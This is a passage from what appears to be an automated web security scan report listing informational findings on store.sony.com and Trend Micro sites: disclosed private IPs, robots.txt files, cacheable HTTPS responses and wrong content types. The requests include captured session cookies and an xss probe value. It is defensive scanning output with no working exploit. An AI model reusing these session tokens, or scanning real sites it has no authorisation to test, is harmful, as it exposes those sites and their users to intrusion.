HTTP/1.1 200 OK==========================================matt@mattkruse.com >...[SNIP]...
16. Private IP addresses disclosed
previous
next
There are 5 instances of this issue:
Issue background
RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.
Issue remediation
There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
16.1. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js HTTP/1.1/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10
Response
HTTP/1.1 200 OK...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]...
16.2. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js HTTP/1.1/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true
Response
HTTP/1.1 200 OK...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]...
16.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js HTTP/1.1/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true
Response
HTTP/1.1 200 OK...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]...
16.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js HTTP/1.1/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true
Response
HTTP/1.1 200 OK...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]...
16.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
GET /wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js HTTP/1.1/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551;q=0.305161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10
Response
HTTP/1.1 200 OK...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]... 192.168.112.2 O7.net/stats_debugger.php\">...[SNIP]...
17. Robots.txt file
previous
next
There are 7 instances of this issue:
Issue background
The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.
Issue remediation
The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.
17.1. http://blog.trendmicro.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blog.trendmicro.com
Path:
/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0
Response
HTTP/1.0 200 OK...[SNIP]...
17.2. http://display.digitalriver.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://display.digitalriver.com
Path:
/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0
Response
HTTP/1.1 200 OK
17.3. http://pastebin.com/i/fixed.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://pastebin.com
Path:
/i/fixed.css
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0
Response
HTTP/1.1 200 OK
17.4. https://store.trendmicro.com/store
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/store
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0
Response
HTTP/1.1 200 OK.1.2.0.2 (G;max-age=0+0;age=0;ecid=67000669097,0)
17.5. http://www.javalobby.org/articles/acegisecurity/part1.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.javalobby.org
Path:
/articles/acegisecurity/part1.jsp
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0
Response
HTTP/1.0 200 OKorlogin!default.jspa/showThreaded/frm/javalobby...[SNIP]...
17.6. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.javaworld.com
Path:
/javaworld/jw-10-2007/jw-10-acegi2.html
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0
Response
HTTP/1.1 200 OK".1315331027247935; path=/; expires=Thu, 05-Sep-13 17:43:47 GMT.com/mak/projects/robots/norobots...[SNIP]...
17.7. http://www.viddler.com/embed/dca1712/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.viddler.com
Path:
/embed/dca1712/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0
Response
HTTP/1.1 200 OK
18. Cacheable HTTPS response
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/favicon.ico
Issue description
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:Cache-control: no-store Pragma: no-cache
Request
GET /favicon.ico HTTP/1.1/*;q=0.5;q=0.7-1315351119372; bn_u=6923713920140458023; __utma=44797537.1048817980.1315351191.1315351191.1315351191.1; __utmz=44797537.1315351191.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; fsr.r={"d":90,"i":"1315351193052_377417","e":1315956018002}; __unam=e9c3bfd-132410b0872-607b674b-1; ORA_WX_SESSION=10.2.2.129:260-0#0; JSESSIONID=885803A57111A855BDA3F7D5608FCD0D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000
Response
HTTP/1.1 200 OK.1.2.0.2 (H;max-age=28800+0;age=21646;ecid=97070579830,0)..... ...............H...H...........................................................VVW ...[SNIP]...
19. HTML does not specify charset
previous
next
There are 4 instances of this issue:
Issue description
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1 .
19.1. http://display.digitalriver.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://display.digitalriver.com
Path:
/
Request
GET /?aid=244&tax=trend_micro HTTP/1.1/us/home/;q=0.302x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0
Response
HTTP/1.1 200 OKContent-Type: text/html 'SCRIPT');.protocol + '//a.netmng.com/?aid=244&tax=trend_micro';ByTagName('head')[0].appendChild(dgt_scr...[SNIP]...
19.2. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SYSearchAjax
Request
GET /webapp/wcs/stores/servlet/SYSearchAjax?keyword=xss&storeId=10151&langId=-1&catalogId=10551 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE
Response
HTTP/1.1 200 OKContent-Type: text/html 45f2c1cd8b18716b437e20bd7c268cce2babb4e666d6d; Path=/%3B%20CX%20Series%20Speakers",StorefrontAssetStore/img/75x49/XSV680C...[SNIP]...
19.3. http://wd.sharethis.com/api/getCount2.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://wd.sharethis.com
Path:
/api/getCount2.php
Request
GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.javaworld.com%2Fjavaworld%2Fjw-10-2007%2Fjw-10-acegi2.html HTTP/1.1/javaworld/jw-10-2007/jw-10-acegi2.html;q=0.3T7FCnHuAg==; __uset=yes
Response
HTTP/1.1 200 OKContent-Type: text/html .processCB({"url":"http:\/\/www.javaworld.com\/javaworld\/jw-10-2007\/jw-10-acegi2.html","email":5,"wordpress":1,"slashdot":2,"twitter":1,"stumbleupon":1,"total":10,"ourl":"http:\...[SNIP]...
19.4. http://www.kb.sony.com/selfservice/common/bg_323232.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.kb.sony.com
Path:
/selfservice/common/bg_323232.html
Request
GET /selfservice/common/bg_323232.html HTTP/1.1/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=http--supportmicrosoftcom-kb-188175&sliceId=&docTypeID=DT_MICROSOFTKB_1_1&dialogID=328792985&stateId=1%200%20328800294/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.315E18D17225FAA3EE70BE26; sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; _ensChanVal=Sony.com|1315352999758; mbox=session#1315352920400-736912#1315354878|PC#1315334914578-928682.19#1316562618|check#true#1315353078; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0; ensUID=249118483jocCbfxsy2s; s_cc=true; c_m=undefinedstore.sony.comstore.sony.com; s_channel=%5B%5B'Other'%2C'1315352981909'%5D%2C%5B'Sony.com'%2C'1315352999758'%5D%2C%5B'Other'%2C'1315353057567'%5D%5D; s_visit=1; s_sq=sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FSearchCatalog%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D10551%252526in_dim_search%25253D%252526keyword%25253Ddvd%25252Bcd%252526x%25253D0%252526y%25253D0%2526oid%253Dhttp%25253A%25252F%25252Fesupport.sony.com%25252FUS%25252Fperl%25252Findex.pl%2526ot%253DA; session_id=e703b26c77d67624f09196594c3079a5; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353059390_9953%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353086011_181202","ru":"http://esupport.sony.com/US/perl/index.pl","r":"esupport.sony.com","st":"","to":3,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":1,"lc":{"d0":{"v":1,"s":false}},"cp":{"session_id":"e703b26c77d67624f09196594c3079a5"},"f":1315353088281}; fsr.a=1315353089818
Response
HTTP/1.1 200 OKContent-Type: text/html
20. Content type incorrectly stated
previous
next
There are 6 instances of this issue:
Issue background
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
20.1. http://display.digitalriver.com/
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://display.digitalriver.com
Path:
/
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain script .
Request
GET /?aid=244&tax=trend_micro HTTP/1.1/us/home/;q=0.302x278vq07m15wd278vr08s2xm1011; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzd2794r06b2ml33d0
Response
HTTP/1.1 200 OKContent-Type: text/html 'SCRIPT');.protocol + '//a.netmng.com/?aid=244&tax=trend_micro';ByTagName('head')[0].appendChild(dgt_scr...[SNIP]...
20.2. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://store.sony.com
Path:
/webapp/wcs/stores/servlet/SYSearchAjax
Issue detail
The response contains the following Content-type statement:The response states that it contains HTML . However, it actually appears to contain JSON .
Request
GET /webapp/wcs/stores/servlet/SYSearchAjax?keyword=xss&storeId=10151&langId=-1&catalogId=10551 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE
Response
HTTP/1.1 200 OKContent-Type: text/html 45f2c1cd8b18716b437e20bd7c268cce2babb4e666d6d; Path=/%3B%20CX%20Series%20Speakers",StorefrontAssetStore/img/75x49/XSV680C...[SNIP]...
20.3. https://store.trendmicro.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
https://store.trendmicro.com
Path:
/favicon.ico
Issue detail
The response contains the following Content-type statement:The response states that it contains plain text . However, it actually appears to contain unrecognised content .
Request
GET /favicon.ico HTTP/1.1/*;q=0.5;q=0.7-1315351119372; bn_u=6923713920140458023; __utma=44797537.1048817980.1315351191.1315351191.1315351191.1; __utmz=44797537.1315351191.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; fsr.r={"d":90,"i":"1315351193052_377417","e":1315956018002}; __unam=e9c3bfd-132410b0872-607b674b-1; ORA_WX_SESSION=10.2.2.129:260-0#0; JSESSIONID=885803A57111A855BDA3F7D5608FCD0D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000
Response
